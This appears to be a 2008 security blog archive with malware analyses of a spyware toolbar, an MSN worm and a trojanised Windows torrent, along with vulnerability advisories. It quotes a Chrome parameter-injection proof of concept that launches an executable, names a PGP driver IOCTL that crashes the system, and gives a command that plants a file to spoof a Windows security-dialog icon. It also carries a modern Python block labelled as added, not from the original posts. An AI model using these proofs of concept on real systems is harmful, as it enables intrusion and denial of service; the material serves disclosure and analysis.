Wednesday, December 31, 2008

EvilFingers - Global Hacker Initiative [EFGHI]

EvilFingers - Global Hacker Initiative [EFGHI], is an attempt to spread the word, expand and network with great hackers around the globe to unify our effort to help our community, the security community.

Just like the above logo, several groups will strengthen our effort and several hackers will unify our goal.

Do contact us if you would like to help us in the expansion process. You can email us at contact.fingers @

- EF

2009, with a good start!!!

To give a good start for 2009, Kirk has worked really hard in completing the next version of Process Memory Dumper [PMD]. The tool is complete and is in the testing phase for a flawless [or minimally flawed] release.

We wish to ensure that 2009 would be a great start for all our users, hence we will be coming up with other possible releases very soon. If you have any views/ideas for enhancing/modifying our site please do shoot us an email and we will consider all your views. Even if your ideas are not considered for enhancements, we will email you the reason for not considering your idea.

Please feel free to contact us at any point of time at contact.fingers @

- EF

An unfortunate occurrence...

2008 ended with an unfortunate occurrence. We came to know that one of our members had submitted PCAPs that were generated from another tool [we weren't completely sure]. We requested the member to confirm [the member accepted the fact that some of the PCAPs did not belong to him] and to resubmit an entire set after removing the PCAPs that could belong to some other proprietary software. But the member did not get back with any changes and we never like to take chances. Hence, the entire buffer overflow PCAP section [35 PCAPs] has been discarded and EvilFingers has terminated the membership of the volunteer who is responsible for this occurrence. Kindly excuse us for any inconvenience.

If you find any proprietary, copyrighted stuff, corporate espionage or even chances to any kind of fraud, kindly contact us without any hesitation at contact.fingers @

- EF

Hello Readers - Happy New Year 2009!!!

May this occasion bring happiness, good health and wealth to all your families. May God bless us all. Let us all show some awesomeness in the forthcoming year.

On this occasion, within the next week EvilFingers is releasing the next version of Process Memory Dumper (PMD). We have also worked on setting up our malware analysis division, and we have some advisories to be released during normal working days, so that we do not ruin the holidays for anyone.

Enjoy your vacation and Happy new year once again.

- EF

Tuesday, December 30, 2008

before submitting your work...

Please consider the following before you think of submitting a work for release:

Do not send us stuff that you have published elsewhere, be it open source or closed source for your job, we don't want to get into licensing or corporate espionage.

Example of a misery: One of our volunteers recently did 35 PCAPs in his 3 months with us. He took up a lot of our other volunteers' time in chats and emails [about 7 - 10 hrs]. Now he comes to us and tells us, after further investigation, that not all 35 were his and that some of them were his friends'. He is not sure whether they were generated or collected online. Even though we keep the name concealed, we share the info, since we do not want any such occurrences again.

- EF

Monday, December 29, 2008

Secure Password Generator v1.0 Released!!!

Secure Password Generator [SecurePwdGen] is a password generator that gives the user the option to choose:

1. The usable set of input char.
2. Length of the password.

Once done, the user is able to generate multiple strong*** passwords by hitting the "Generate" button. This tool was coded in .NET.


Credits: Kirk McGraw

Let us know your views, reviews and questions. Contact us at contact.fingers @

*** - Strength of the password depends on the input set provided by the user.

This tool could be found at the following link:

- EF

Sunday, December 28, 2008

The "DesktopSmiley, Not A Spyware" ToolBar

The "Not A Phishing Worm" really got me interested as it sent special Christmas messages, so I decided to dig in just a bit. As it turns out, after the user supplies his MSN credentials, his friends get a link to the "Not A Phishing" website and a lot of tricky links leading to a download of their toolbar, which they say is "Not Spyware".

So we got a non-phishing worm downloading a non-spyware program, let's see its non-evil actions :)
The first thing I did was to download the installer, which asks no questions and shows no EULA. It is also digitally signed by "DoubleD Advertising Limited"; well, that's really funny, we have got to give them that :)

So I ran it in a VM:

That is quite original! "A non-virtualized hardware system is required"; of course anybody technical gets how lame this lie is :)
Why would an IE toolbar "require" "non-virtualized hardware", and why would it even bother to check whether it is running in a virtualized environment unless it has some illegal actions to hide?!

Well, I am definitely not going to execute it on my machine :)
Maybe I will test it some other day on a real machine with Restore-IT/Ghost.

In the meantime, let's take a look at some of the things that it does:
It copies some IE settings from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (except for AutoDetect and UNCAsIntranet, which already exist there and get modified):
ProxyBypass:1 (default 1)
IntranetName:1 (default 1)
MigrateProxy:1 (default 1)
AutoDetect:1 (default 0)
UNCAsIntranet:1 (default 0)
ProxyEnable:0 (default 0)

It sure looks like someone is going to assign a proxy for us :)

The setup process command-line:
"C:\Documents and Settings\Insider\Local Settings\Temporary Internet Files\{5617ECA9-488D-4BA2-8562-9710B9AB78D2}\stbup.exe" /new /src=user

The "/src=user" really sounds like there are cases in which the user did not initiate the installation :) It could be used for self-update though.

Let's examine some of the strings in the memory of this "DoubleD" software:
Well, I don't want to point a blaming finger, but it seems this "legitimate smiley IE toolbar" is very interested in getting some access to our saved PuTTY SSH hosts... quite innocent.

There is a lot of weird stuff this spyware does, like starting a local proxy, which explains how they steal data from IE and makes this self-updating software a cool way to build a non-botnet botnet :)
It also implements an SSH client and almost every famous encryption algorithm (Rijndael, AES, DES, 3DES, Blowfish); it looks like it performs local MITM attacks against SSH login software.

So get root and Smile away with it :)

The MSN "Not A Phishing Worm"

This is a funny one actually :)
I was just working as usual when I got the following message on my MSN Messenger:
This is how real girls party. Great high quality pictures on
Now of course I understood that it's a worm, but still, let's see where it leads to.
So I went into the site and it looked like this:

With what I have seen until now, this is a classic phishing site; I saw dozens
like it for Yahoo! in the past. But wait! Let's look at that GREY text below:

Terms of Use / Privacy Policy:

By filling out this form, you authorize T P Ltd to spread the word about this new 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties. By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a "phishing" site that attempts to "trick" you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).


We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time. You will not be subscribed to anything asking for payment. This service is made possible by many hours of human effort.

T P Ltd reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, T P Ltd is NOT agreeing to MSN's terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

OK, they said in the text:
This is not a "phishing" site that attempts to "trick" you into revealing personal information.
So they don't want our usernames and passwords (and for most people the username is also their EMAIL address); yeah, I believe them, sure.

They just want to:
1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.
Which is completely different from what a worm does. A worm just spreads and "introduces" "entertaining" sites with a lot of porn and exploits.
By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us.
Yeah, why not, take my account and send spam "on behalf of third parties", and if they get, like, hacked or something, we are not responsible, you agreed to this.

I believe this should be called "Legal Phishing User Agreement" or "Worm As A Service".
It is also a little weird that a "legal" domain called "" is dealing with MSN accounts and not PICTURES FROM PARTIES, and has unlimited (*.) subdomains and only 1 page, don't you think?!
Of course they used domain protection:
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Well, don't fill in any form you see without reading the small (and in this case GREY) print :)

The same worm also sends this message:

"[msn_dst_user], claim your Prize!


congratulations [msn_dst_user]!!!


merry XMAS heres your gift


[msn_dst_user], claim your Xmas Card!

[msn_dst_user], see the pics from yesterday's christmas party what do u think?
The messages are updated by the hour; these ones are specific to Xmas.
Any file or subdomain in redirects to

Which is also registered by WHOISGuard.
Both these websites were built to make people download this:

Which they claim is:

"Download DesktopSmiley to get 1000's of FREE Smileys!
It's totally FREE! No Registration. No Spyware."

Yes, a toolbar advertised by a WORM is not spyware, sure...
The example above was version 2.0c. It seems these guys used different methods, different domains and different company names in the older versions (which is typical of viruses and spyware but not of legitimate software).
The following example belongs to an older version, 1.1c, with this MSN message:

Which prompts a download for "", which is an EXE file with a COM extension; when run, the Windows loader does "true type detection" and it executes as the regular EXE file it is.
Those people don't care a bit and they left "Directory Browsing" open in the subdomain's root, check it out at:
They even forgot to remove their private packer from the site:

They also have a version at: (which I think just went down...)
Which loads "" and "" and VERIFIES that the request's REFERER is "", so a direct reference to these files returns "404 Not Found".

Blue Screen of Death - is still alive?

Blue screen of death still rules...

- EF

RIP CastleCops

We felt really sorry when we saw the announcement at CastleCops website.


Greetings Folks,

You have arrived at the CastleCops website, which is currently offline. It has been our pleasure to investigate online crime and volunteer with our virtual family to assist with your computer needs and make the Internet a safer place. Unfortunately, all things come to an end. Keep up the good fight folks, for the spirit of this community lies within each of us. We are empowered to improve the safety and security of the Internet in our own way. Let us feel blessed for the impact we made and the relationships created.

With respect to the server marathon, by March 17 2009 CastleCops will refund contributions made through PayPal that were specifically designated for servers. Unfortunately, server donations made via check cannot be returned because we do not have the addresses for the donating entity. Unless instructed otherwise, CastleCops will re-allocate these funds as a donation to the Internet Systems Consortium ( This organization sponsored our hosting environment for approximately the past 2 years. Please contact us [cc at laudanski dot com] before March 17, 2009, if you would like a return of your server marathon donation. Otherwise, we would like to thank the ISC for their unfettered support.

We thank everyone in creating our unique footprint and memories in time.

Love, Best Wishes and Happy Holidays, CastleCops
PST 23 Dec 2008

***********END OF SNIPPET***********

We indeed feel sad for such a great security open community closing all of a sudden. We wish to help with whatever we can, to bring them back up. Let us know, how we could be of help.

- EF

Please consider this before you email us for volunteering

We have done this drill before. We would like to try it out once again.

We receive emails such as "I would like to volunteer." or "I would like to enter your team.". It is going to be a time consuming process for you as well as us.

Just FYI, everything that comes to us remains confidential. Anything you wish to reveal will be the only detail that will be revealed.

From here on, we would like emails that tell us the following:

(1) Who you are?
(2) What you do?
(3) What can you do other than what you do?
(4) Why would you like to volunteer?
(4.a) What you would like to do for us?
(4.b) What would you like to learn from us?
(5) Your skills that you could use for the site ***Autonomously***?

At the current stage we are a DEVELOPING or UNDER DEVELOPED site, hence we invite only volunteers with PRIOR experience in the field or in the stuff that they wish to volunteer for. We expect that the volunteer would be able to handle the tasks that they are assigned, AUTONOMOUSLY.

Over a period of a few days to a few months, depending on contribution status, volunteers would be introduced to other volunteers and teams in the site to continue the process of learning and sharing knowledge, which is when you would be able to learn a set of new skills from others in the team.

We thought of doing this drill once again because we receive many emails these days with volunteering intent (which is great), but the handshake part has grown beyond a 3-way handshake due to the following:

1. Lack of information in emails and chats.
2. Delay in emails and chats, which starts the handshake once again due to session termination.
3. Emails saying that someone wishes to volunteer in a section that you don't know nada/null about, because it is going to take more time for us to explain why we don't do that at the moment.

We received some emails lately asking us to train people in a specific field and then expecting them to volunteer. It is definitely a good process, but since we are still at our infant stage, we are unable to accommodate it. We would rather delay it for now, and once we see contribution from you at some point, we will help you in your learning process.

Do let us know if you have any views or comments on this. We appreciate all inputs and we respond to every single email that we receive. Since we are also not doing this on a full-time basis, and since everything is done out of contribution and passion, we are in the same boat as you are.

We thank all our current and past volunteers and we wish them success in their life and careers.

Emails are welcome at contact.fingers @ [GMAIL rocks!!!]

- EF

Malware Analysis team

We are opening up a malware analysis team. Giuseppe Bonfa will be our Channel manager for this team and we are working on bringing in more volunteers for it. Rajdeep is joining this team as a malware analyst for now and later would be moving to driver programming. If you are interested in joining this team, and if you have ***PRIOR EXPERIENCE*** in malware analysis, in doing work ****AUTONOMOUSLY****, in development of tools, etc. that could be beneficial for team work, please do contact us at Contact.Fingers @

- EF

Saturday, December 27, 2008

Giuseppe 'Evilcry' Bonfa - Italian EvilFingers Team

Giuseppe 'Evilcry' Bonfa is our team lead for our brand new Italian EvilFingers team. The nectarGrid project was started in the team with hopes pinned on one of our past team members, who gave up a while ago. Hence, Giuseppe would be taking his position and running our Italian team soon.

- EF

Friday, December 26, 2008

PGP Desktop PGPwded.sys (2)

The PGP Desktop PGPwded.sys Driver Denial of Service Vulnerability discovered some days ago has been confirmed also in version 9.9.0 build 397.

Google Chrome Browser (ChromeHTML://) remote parameter injection POC - Source:

RetroGod Rocks!!!

Author: Nine:Situations:Group

<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
tested against: Internet Explorer 8 beta 2, Google Chrome, Microsoft Windows XP SP3
List of command line switches:
Original url:

click the following link with IE while monitoring with procmon
-->
<a href='"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

# [2008-12-23]

Thursday, December 25, 2008

Big Brands XSS

Apple Store - XSS

American Express - HTTPS XSS

How can we customers trust the big brand companies when our accounts are compromised and we can no longer trust links to those empires' websites?!

Disclaimer: Knowledge is free. Security is the core. This publication is for knowledge ONLY. Rafel Ivgi or is not responsible for any vulnerabilities listed in this page. Kindly, read the legal section before any second thoughts.

Our Worms & Exploits blog made the news for "An SQL Server Zero-Day Exploit In Time For Christmas"

The Security Pro News guys have released a news item on the topic "An SQL Server Zero-Day Exploit In Time For Christmas". Here is the news on the Worms&Exploits Blog.

*****NEWS SNIPPET*****

Worms and Exploits doesn't make it sound all that difficult though:

"This could be exploited by sending a payload with specially crafted values which could result in a memory corruption, and then this could be exploited to execute arbitrary code with the privileges of the current user. But authentication is required to exploit this vulnerability, it is also exploitable via SQL injection, by using the authentication credentials of the vulnerable web application. A proof-of-concept is already been publicly available at places for this vulnerability."

The author offers some workarounds, though.

Microsoft offers this reassurance as well: "…due to the mitigating factors for default installations of MSDE 2000 and SQL Server 2005 Express, Microsoft is not currently aware of any third-party applications that use MSDE 2000 or SQL Server 2005 Express which would be vulnerable to remote attack."

*****SNIPPET ENDS*****

Contact us for anything & everything.

- EF

Welcome Rajdeep Chakraborty [] !!!

Rajdeep Chakraborty is our new team member in the malware analysis team. To start with his contribution, he has released a subnet calculator. He will now be working on the anti-Rootkits team and the Process management team.

Rajdeep Chakraborty can be contacted at rajdeep.chakraborty @ and we can be reached at contact.fingers @

- EF

Wednesday, December 24, 2008

SO Common and yet EVIL goes free :)

Before I start this one, I must say I never thought of myself as a blogger.
I was always reading other people's blogs thinking they try to be "I am cool, I have a blog" kind of people. Well, I just think the malicious stuff I see every day should be shared with YOU :)

Torrents are currently the world's most active network for file sharing. The current Windows version is always one of the most shared files, and therefore crime follows there :)

I recently decided to put it to the test and downloaded the most "seeded" file I found, which was "Windows XP Pro.Corp. Edition SP3 June 2008 Update + SATA Driver"; this is still one of the most shared files. Of course I scanned it using the latest fully updated versions of Kaspersky 2009 and Dr.Web, which according to my tests are currently the best detectors on the market. Well, nothing was found...

So I loaded the ISO, the AutoRun executed and I just "felt" something was wrong!! I looked at Process Explorer and I saw a process called "file.exe"... hmmmmm....
I figured out that the bad guys replaced the original "setup.exe" with a silent self-extracting WinRAR installer with the original setup icon; it extracts a Trojan Downloader called file.exe and the original setup.exe to the temp directory and executes both the Trojan and the original setup (with CurrentDirectory set to the WinRAR install path).

Here is a scan of the malicious "setup.exe" installer (today, 2 months after I found this):

I said O.K., maybe they didn't go through the trouble of flagging the "Installer", but they all detect the Trojan Downloader, right?

Well, they didn't :)
It is really funny to see that all you need to be "top notch" malicious software is to just download WinRAR and NSIS (Nullsoft Scriptable Install System) and create a Windows XP SP3 installation torrent, and this after 20 years of anti-virus security technology from a 7 billion dollar a year market.

More funny stuff! The author of this virus was so lazy he just put in a list of relative paths to the real setup executables of all the software he will infect and share on the internet, so the "setup.exe" he made will try to execute a list of files of which only one should exist in your infected download :)
Some Examples:

Be aware of what you download! It seems the best way to tell if it's an infected setup is to right-click setup.exe and see if WinRAR suggests "Extract To" (I am joking of course).

The executed "file.exe" downloaded , which is also an NSIS file and also a Trojan Downloader; my upload was the first time it was scanned on VirusTotal, and you can guess the results:

What's really annoying me in this result is that the 3-4 anti-viruses that "supply a solution" above and detect the downloader DO NOT DETECT THE CONSTANT FILE IT DOWNLOADS, which means all the malware creator needs to do is modify the downloader or use a new one, and there he goes again infecting the entire planet and getting away with it!

Now "3913574.exe" is downloaded,
which is not packed by a known packer and is not even identified as having "packed entropy" by PEiD. It is a small application compiled by MS VC++ 7/8, 72kb.
Its import table is quite limited and it calls GetProcAddress to get:
SetProcessPriorityBoost, WriteFile, GetEnvironmentVariableA, InternetOpenA, ExitProcess, GetTempPathA, InternetCloseHandle, CloseHandle, TerminateProcess, CreateFileA, DeleteFileA,SHChangeNotify, lstrcpyA, lstrcpyn, InternetGetConnectedState, GetAdaptersInfo
SetThreadPriority, GetModuleFileNameA, Sleep, ShellExecuteEx, InternetOpenUrlA

Of course the strings are not plaintext and it is also not XOR, how refreshing!!! It is a nice routine that identifies a header byte and multiplies the bytes with a word chosen per this header; maybe it is some kind of light compression.

Now more than 10 executables are downloaded onto your system; some are detected by some AVs and some are not. They are packed with Armadillo v1.71 and some with ASPack v2.12.

These executables are saved in:

  • MicroAV.exe


  • 1.exe, 2.exe, 3.exe, 4.exe, 5.exe, 7.exe

and of course to %windir%\system32

  • MicroAV.cpl, apgambly.dll, biqwetjd.dll and three DLLs with names that are 8-character random [a-zA-Z0-9] strings
About 5-6 entries are added to registry->Run to load the processes that bug you in the system tray. This home-made looking Trojan is much more advanced than it appears to be...
Clearly these evil guys are advancing and they don't stop at loading from registry->Run:
they start using advanced loading methods such as registering as Authentication Packages to be loaded inside LSA, and as logon notification DLLs to be loaded inside winlogon.exe (which is one of the best places to be, since it cannot be terminated).

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\yayxuSIb]

"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,43,\

Other official releases of "PGP Desktop 'PGPweded.sys' Local Denial of Service Vulnerability"

Thanks to Media.
- EF

Mountassif Moad - Our Moroccan POC

Mountassif Moad aka. Stack is our vulnerability analyst. He is now running EvilFingers Moroccan team and is our new blogger. Mountassif Moad, will be blogging in Moroccan and French.

If you have any questions contact us at contact.fingers @

- EF

Tuesday, December 23, 2008

Milw0rm & Securiteam have just confirmed the release

Contact us for any questions : contact.fingers@

- EF

PGP Desktop 9.0.6 Denial Of Service - ZeroDay

PGP Desktop 9.0.6 Denial Of Service Vulnerability.

Version Affected:
PGP Desktop 9.0.6 [Build 6060] (other version could be affected)

Component Affected:

Release Date: 23 December, 2008

PGP Desktop's PGPweded.sys driver does not sanitize user-supplied input (IOCTL), and this leads to a driver crash that takes the system down with a BSOD. The affected IOCTL is 0x80022038.


Giuseppe 'Evilcry' Bonfa' (Team Lead, /

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.


Contact us for any questions @: contact.fingers @

Why do we use Gmail? Because Google rocks, and GMAIL is definitely a good stuff from the very beginning.

- EF

Monday, December 22, 2008

Windows "Open File - Security Warning" Dialog

Not so long ago, I found one of the most bizarre bugs. It seems there is some kind of bug in the parsing of the command line read from the registry for file types handled by explorer.exe. This was checked on Windows XP SP3 but I guess it exists in SP2 too. This bug allows controlling the icon which appears in the "Open File - Security Warning" dialog for all the executables downloaded from the internet.

Each time you download a file from the internet/intranet to a drive with an NTFS file system, an ADS (Alternate Data Stream) INI file called "Zone.Identifier" is created. This hidden INI file specifies the zone the file came from; this can be the internet or the local network (intranet).

You can see it using the following in cmd:
more < exe_from_internet.exe:Zone.Identifier
The ini will be printed to the screen:

When you "click" (ShellExecute) a file whose handler is explorer.exe, the Zone.Identifier is checked, and if the zone is 3 (internet) the following screen appears:

Well, it appears that each time you try to open an executable that came from the internet, the icon that will appear in this dialog will be parsed from an executable file called ".exe" or "%1" in any directory of the "PATH" environment variable for the user running explorer.exe, for example:


you can create such a file using "cmd /c type c:\windows\system32\calc.exe > c:\windows\.exe"
or write a code to use CreateFile :)

The file request is FASTIO_NETWORK_QUERY_OPEN and the icon is cached in memory until explorer.exe process is terminated. If you want to further explore this case, here is the call stack:
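As an added example, not code from the original post: the first part parses the INI-style Zone.Identifier stream shown above and decides whether the dialog will appear (zone 3, as the post states); the second part is the check a defender would run in response to the icon bug, listing every PATH directory that holds a file literally named ".exe" or "%1". The sample stream text and the directory listings are constructed, and the function names are this example's own; the PATH-scanning function takes an injectable directory lister so it can run against a captured listing as well as a live host.

```python
import os

ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}
ICON_HOST_NAMES = {".exe", "%1"}  # file names the post says supply the dialog icon


def parse_zone_identifier(stream_text):
    """Parse the INI-style Zone.Identifier stream into {section: {key: value}}."""
    sections, current = {}, None
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def zone_id(stream_text):
    """ZoneId from the [ZoneTransfer] section, or None if the stream is absent or malformed."""
    try:
        return int(parse_zone_identifier(stream_text)["ZoneTransfer"]["ZoneId"])
    except (KeyError, ValueError):
        return None


def shows_security_warning(stream_text):
    """Per the post, the "Open File - Security Warning" dialog appears for zone 3 (Internet)."""
    return zone_id(stream_text) == 3


def icon_host_candidates(path_value, listdir=os.listdir, pathsep=";"):
    """Full paths of files named '.exe' or '%1' in any directory of a Windows PATH value."""
    hits = []
    for directory in filter(None, path_value.split(pathsep)):
        try:
            names = listdir(directory)
        except OSError:  # directory missing or unreadable: skip it
            continue
        hits.extend(directory.rstrip("\\") + "\\" + n for n in names
                    if n.lower() in ICON_HOST_NAMES)
    return hits


# Constructed sample: what `more < file.exe:Zone.Identifier` prints for an Internet download.
SAMPLE_STREAM = "[ZoneTransfer]\r\nZoneId=3\r\n"

# Constructed directory listings standing in for a host's PATH (hypothetical contents).
SAMPLE_LISTINGS = {
    r"C:\WINDOWS\system32": ["calc.exe", "cmd.exe"],
    r"C:\WINDOWS": [".exe", "explorer.exe"],
    r"C:\Tools": ["%1"],
}
SAMPLE_PATH = ";".join(SAMPLE_LISTINGS)


def sample_listdir(directory):
    """os.listdir stand-in backed by the constructed listings."""
    if directory not in SAMPLE_LISTINGS:
        raise FileNotFoundError(directory)
    return SAMPLE_LISTINGS[directory]


if __name__ == "__main__":
    zid = zone_id(SAMPLE_STREAM)
    print("zone:", zid, ZONE_NAMES.get(zid), "| warning dialog:", shows_security_warning(SAMPLE_STREAM))
    for hit in icon_host_candidates(SAMPLE_PATH, listdir=sample_listdir):
        print("icon host candidate:", hit)
```

On a real machine, call `icon_host_candidates(os.environ["PATH"])` from a Python running as the user whose explorer.exe you care about, since PATH is per-user; an empty list is the expected result.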

Welcome Rafel Ivgi aka The-Insider!!!

Rafel Ivgi is a CTO/Chief Architect at Aspect9 Security, Israel. He is also author of several websites:

Rafel will be managing our Israel division of EvilFingers along with its content and projects. All/most of the projects will also be shared with his blogs and with SecuriTeam site.

Contact us @ contact.fingers @ if you wish to become a translator for any language. We will work out a plan for you.

- EF

Sunday, December 21, 2008

Three undersea cables cut: traffic disturbed between Europe and Asia

This is not usual for the ZDNET ZeroDay blog. Is something wrong with my internet connection?

December 17th, 2008
Thousands of legitimate sites SQL injected to serve IE exploit
Posted by Dancho Danchev @ 1:19 pm

The above is the last posting for ZDNET ZeroDay blog and it is NOT normal.

On further checking the news, one of our friends found this story at the following link:, which for some reason did not make the headlines at many other news channels; sounds like a coincidence.


*********************BEGINNING OF NEWS****************************

Dec 19, 2008
Three undersea cables cut: traffic disturbed between Europe and Asia

3 cables cut this morning (Sea Me We3 partly + Sea Me We4 + FLAG)France Telecom Marine cable ship about to depart

PARIS — France Telecom observed today that 3 major underwater cables were cut: “Sea Me We 4” at 7:28am, “Sea Me We3” at 7:33am and FLAG at 8:06am. The causes of the cut, which is located in the Mediterranean between Sicily and Tunisia, on sections linking Sicily to Egypt, remain unclear.

Most of the B to B traffic between Europe and Asia is rerouted through the USA. Traffic from Europe to Algeria and Tunisia is not affected, but traffic from Europe to the Near East and Asia is interrupted to a greater or lesser extent (see country list below).

Part of the internet traffic towards Réunion is affected as well as 50% towards Jordan. A first appraisal at 7:44 am UTC gave an estimate of the following impact on the voice traffic (in percentage of out of service capacity):

* Saudi Arabia: 55% out of service
* Djibouti: 71% out of service
* Egypt: 52% out of service
* United Arab Emirates: 68% out of service
* India: 82% out of service
* Lebanon: 16% out of service
* Malaysia: 42% out of service
* Maldives: 100% out of service
* Pakistan: 51% out of service
* Qatar: 73% out of service
* Syria: 36% out of service
* Taiwan: 39% out of service
* Yemen: 38% out of service
* Zambia: 62% out of service

France Telecom immediately alerted one of the two maintenance boats based in the Mediterranean area, the “Raymond Croze”. This France Telecom Marine cable ship based at Seyne-sur-Mer has received its mobilization order early this afternoon and will cast off tonight at 3:00 am with 20 kilometers spare cable on board. It should be on location on Monday morning for a relief mission.

Priority will be given to the recovery of the Sea Me We4 cable, then on the Sea Me We3.

By December 25th, Sea Me We4 could be operating. By December 31st, the situation should be back to normal.

Source: France Telecom

*********************END OF NEWS*************************

Do send us stuff if you wish to post something here, or if you wish to become our blog writer, developer or do anything that you would like doing, but haven't been given a chance in the outside world.

- EF

.:: Backdoor.Win32.UltimateDefender.gtz - Reversing::.

Abstract : install.exe presents the typical structure of a medium-evolved malware, with basic obfuscated dummy code, some layers of encryption decoded at runtime and custom hash functions used as an integrity check. We can also see an interesting technique that retrieves API addresses on demand through a series of hardcoded values that correspond to some API; the corresponding API address is computed at runtime and chosen as a function of the hardcoded value.

Credits : Giuseppe Bonfa

Link to the publication : Backdoor-UltimateDefender.pdf

Links to publication section(s) :



If you wish to publish your research, articles, journal, books, or anything that is related to the community, do contact us at contact.fingers @

- EF

Friday, December 19, 2008

Honeypot SMTP Server is giving a FREE download of this tool on *CUSTOM REQUEST* once it is ready for release after quality analysis, code analysis, stress analysis, etc.

This time, though, we would prefer a mutual agreement with whoever wants this tool: they give us their logs for analysis, and in return receive any alerts or analysis results that we obtain from the inputs they submit. We are working on a tool to automate this process too.

If you have any further questions do feel free to contact us at contact.fingers @

Credits for Honeypot SMTP Server go to Jack O'Neill

- EF

Thursday, December 18, 2008

Fraud, Crime, Layoffs and Poverty

How are they proportional?

When the economy shatters, as it is doing right now, what are its causes and effects?

Cause: A few rich guys did not care about the "conditions" that applied when lending to the smaller guys.
Effect: Bailout. Simple, right?

Cause: The economy goes down.
Effect: Stocks go down, industries lack sponsors and money, investment banking has entered the dark world.

Cause: Industries not doing well.
Effect: A random lottery of layoffs and random firing of employees.

Cause: Joblessness.
Effect: Searching for jobs, cutting down one's standard of living (which some people don't think of), more time to think.

Cause: More time, joblessness and the irritation of searching for jobs.
Effect: People tend to think about alternate sources of income.

Cause: Alternate sources of income.
Effect: Shortcuts to earn money, fraud and crime.

Cause: Increase in fraud and crime.
Effect: The economy goes down more steeply.

Isn't that a never-ending circle? Where does it all begin? Well, you all know where it begins, but that is not what is important. The important question to answer is: "When does this end, and with a happy ending?"

- EF

Wednesday, December 17, 2008

Microsoft Security Bulletin MS08-078 - Critical

Official release can be found at, part of which is listed below:

Microsoft Security Bulletin MS08-078 - Critical
Security Update for Internet Explorer (960714)
Published: December 17, 2008

Version: 1.0
General Information
Executive Summary

This security update resolves a publicly disclosed vulnerability. The vulnerability could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This security update is rated Critical for Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, and Internet Explorer 7. For information about Internet Explorer 8 Beta 2, please see the section, Frequently Asked Questions (FAQ) Related to This Security Update. For more information, see the subsection, Affected and Non-Affected Software, in this section.

The security update addresses the vulnerability by modifying the way Internet Explorer validates data binding parameters and handles the error resulting in the exploitable condition. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.

This security update also addresses the vulnerability first described in Microsoft Security Advisory 961051.

Recommendation. Microsoft recommends that customers apply the update immediately.

Known Issues. None

This is based on the vulnerability released in the following page (

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
Published: December 10, 2008 | Updated: December 17, 2008

Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS08-078 to address this issue. For more information about this issue, including download links for an available security update, please review MS08-078. The vulnerability addressed is the Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844.


You can provide feedback by completing the form by visiting Microsoft Help and Support: Contact Us.

Customers in the United States and Canada can receive technical support from Microsoft Product Support Services. For more information about available support options, see Microsoft Help and Support.

International customers can receive support from their local Microsoft subsidiaries. For more information about how to contact Microsoft for international support issues, visit International Support.

Microsoft TechNet Security provides additional information about security in Microsoft products.


The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.


December 10, 2008: Advisory published

December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.

December 12, 2008: Revised to correct operating systems that support Windows Internet Explorer 8 Beta 2. Also added more workarounds and a reference to Microsoft Security Advisory (954462).

